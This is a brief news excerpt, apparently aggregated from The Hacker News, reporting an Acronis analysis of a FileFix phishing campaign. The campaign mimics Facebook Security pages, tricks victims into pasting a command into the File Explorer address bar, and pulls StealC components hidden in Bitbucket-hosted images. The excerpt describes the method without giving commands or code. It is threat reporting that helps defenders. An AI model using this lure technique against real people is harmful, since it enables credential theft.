""The observed campaign uses a highly convincing, multilingual phishing site (e.g., fake Facebook Security page), with anti-analysis techniques and advanced obfuscation to evade detection," Acronis security researcher Eliad Kimhy said in a report shared with The Hacker News. At a high level, the attack chain involves the use of FileFix to entice users into launching an initial payload that then proceeds to download seemingly innocuous images containing the malicious components from a Bitbucket repository."
"FileFix, first documented by security researcher mrd0x as a proof-of-concept (PoC) in June 2025, is a little different from ClickFix in that it eschews the need for users to launch the Windows Run dialog and paste an already copied obfuscated command to complete bogus CAPTCHA verification checks on phishing pages set up for this purpose. Instead, it leverages a web browser's file upload feature to deceive users into copying and"
The campaign leverages a FileFix variant to deliver the StealC information stealer. Attackers deploy convincing, multilingual phishing sites that mimic Facebook Security and employ heavy obfuscation, junk code, and fragmentation to hinder analysis. Victims are lured to click an appeal button and are then prompted through a FileFix flow to copy and paste a command into the File Explorer address bar, executing it locally. The initial payload downloads apparently benign images from a Bitbucket repository that contain malicious components, abusing trust in a legitimate hosting platform to evade detection.
Read at The Hacker News
Unable to calculate read time
Collection
[
|
...
]